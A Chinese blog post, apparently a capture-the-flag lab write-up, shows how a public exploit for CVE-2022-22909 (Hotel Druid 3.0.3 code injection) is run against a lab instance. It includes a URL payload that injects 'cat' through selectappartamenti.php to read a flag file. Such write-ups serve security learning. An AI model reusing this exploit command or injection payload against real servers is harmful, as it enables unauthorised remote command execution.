[春秋云镜]CVE-2022-22909

已于 2022-12-03 21:23:01 修改
阅读量854 收藏
点赞数 1
分类专栏: 靶场 春秋云镜 文章标签: web安全
于 2022-11-28 20:04:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niubi707/article/details/128086100
版权
本文介绍了CVE-2022-22909漏洞,该漏洞可能导致远程代码执行。提供了一个GitHub资源链接用于研究,并详细说明了如何利用--noauth标志绕过身份验证访问靶场。通过特定URL成功读取到flag,强调了安全测试的重要性。
摘要由CSDN通过智能技术生成

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

前期准备工具

GitHub - 0z09e/CVE-2022-22909: Hotel Druid 3.0.3 Code Injection to Remote Code Execution

靶场地址

http://eci-2ze51ta3xlpb5h4hs28a.cloudeci1.ichunqiu.com

应用程序没有身份验证。运用该–noauth标志不履行身份验证。

 python exploit.py -t http://eci-2ze51ta3xlpb5h4hs28a.cloudeci1.ichunqiu.com/ --noauth  

读取flag

http://eci-2ze51ta3xlpb5h4hs28a.cloudeci1.ichunqiu.com/dati/selectappartamenti.php?1=cat%20../../../../../flag

成功获取flag


 

春天11-
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
春秋云境】CVE-2022-22963靶场WP和CVE-2022-22909靶场WP
果粒程
12-06 1550
春秋云境】CVE-2022-22963靶场WP和CVE-2022-22909靶场WP
春秋云镜 CVE-2022-22909
qq_22002773的博客
07-19 256
春秋云镜 CVE-2022-22909
spring Security RegexReauestMatcher 认证绕过漏洞 CVE-2022-229(2022-09-01)
qq_38220334的博客
09-01 432
然后就陷入的沉思,到底哪里出了问题,有一个想法出来了,那就是jar包之间的依赖关系,在idea中查看jar包之间的依赖关系。原来,5.5.3的版本信息都来源于这里,鼠标放上去发现它的version居然是2.5.6,2.5.6从何而来?但是在我们的工程中并没有生效,重新导入jar包后,还是5.5.3的版本。然后就搜2.5.6,原来是这个配置影响了整体的jar包的引入,点击这个jar包进去,会发现,5.5.3的版本就是在这里引入的。在网上搜了好些方法,都是直接引入。...
CVE-2022-24990信息泄露 RCE漏洞
PolarPeak的博客
06-05 2246
Terramaster TOS是中国铁威马(Terramaster)公司的一款基于Linux平台的,专用于erraMaster云存储NAS服务器的操作系统。 Terramaster TOS 4.2.29版本存在命令注入漏洞,该漏洞源于api.php脚本中的webNasIPS 组件中的输入验证不正确。未经身份验证的攻击者可以发送特殊数据利用该漏洞并在目标系统上执行任意命令。 TerraMaster TOS mobile.class.php文件的createRaid方法存在远程命令执行漏洞 ,攻击者配合 CVE
spring漏洞复现(cve-2022-22947,cve-2022-22963,cve-2022-22965)
qq_57939909的博客
08-30 1347
spring漏洞复现
[春秋云镜]CVE-2022-22965
niubi707的博客
11-29 812
[春秋云镜]CVE-2022-22965复现
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
记录春秋云镜CVE-2022-32991复现过程
as_adwd的博客
03-19 245
个人记录(新手小白)春秋云镜CVE的复现过程
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
春秋云镜CVE-2022-30887
09-05
春秋云镜CVE-2022-30887是指Pharmacy Management System文件上传漏洞,该漏洞的CVE编号为CVE-2022-30887。此漏洞可能允许攻击者通过上传恶意文件利用系统中的漏洞。请注意,由于未提供更多信息,我无法提供详细的...
春秋云镜CVE-2022-30887用蚁剑
09-05
- *2* [春秋云镜CVE-2022-32992](https://blog.csdn.net/qq_45317844/article/details/128552593)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
[漏洞分析] CVE-2022-0185 linux 内核提权(逃逸)
热门推荐
Breeze的博客
02-18 1万+
CVE-2022-0185 分析 文章目录CVE-2022-0185 分析漏洞简介环境搭建漏洞原理漏洞复现POC漏洞利用EXP参考 漏洞简介 漏洞编号: CVE-2022-0185 漏洞产品: linux kernel - fsconfig syscall 影响版本: linux kernel 5.1-rc1 ~ 源码获取: apt source linux-image-unsigned-5.13.0-25-generic 或 https://mirrors.edge.kernel.org/pub/linu
CVE-2022-21999 Windows Print Spooler(打印服务)特权提升漏洞
做自己喜欢的事,并将其发挥到极致!
03-19 6429
文章目录一、Print Spooler 简介二、漏洞简介三、影响版本四、本地复现五、漏洞修复 一、Print Spooler 简介 Print Spooler是打印后台处理服务,即管理所有本地和⽹络打印队列及控制所有打印⼯作。如果此服务被停⽤,本地计算机上的打印将不可⽤。如果此服务被禁⽤,任何依赖于它的服务将⽆法启⽤,被⼴泛应⽤于本地和内⽹中! 二、漏洞简介 2021年6⽉29⽇,安全研究⼈员在GitHub上公开了CVE-2021-1675 Windows Print Spooler远程代码执⾏漏洞的Po
CVE-2022-23131漏洞复测
weixin_42618425的博客
02-23 9680
CVE-2022-23131漏洞复测 1、漏洞介绍 Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。 2、漏洞复测 利
[CVE-2022-22965]Spring远程代码执行漏洞复现
sGanYu
04-26 4749
漏洞概述(级别:高危) 续上一次Log4j2后,于2022年03月29日,Spring官方发布了Spring框架远程命令执行漏洞公告(CNVD-2022-23942、CVE-2022-22965) 攻击者可以通过构造恶意请求来利用这些漏洞,从而造成任意代码执行,未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行,该漏洞广泛存在于Spring框架以及衍生的框架中,JDK 9.0及以上版本会受到此漏洞影响 FOFA语法 app="APACHE-Tomcat" || app="vmware-Sprin
【网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 264
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1076
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
09-06 633
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值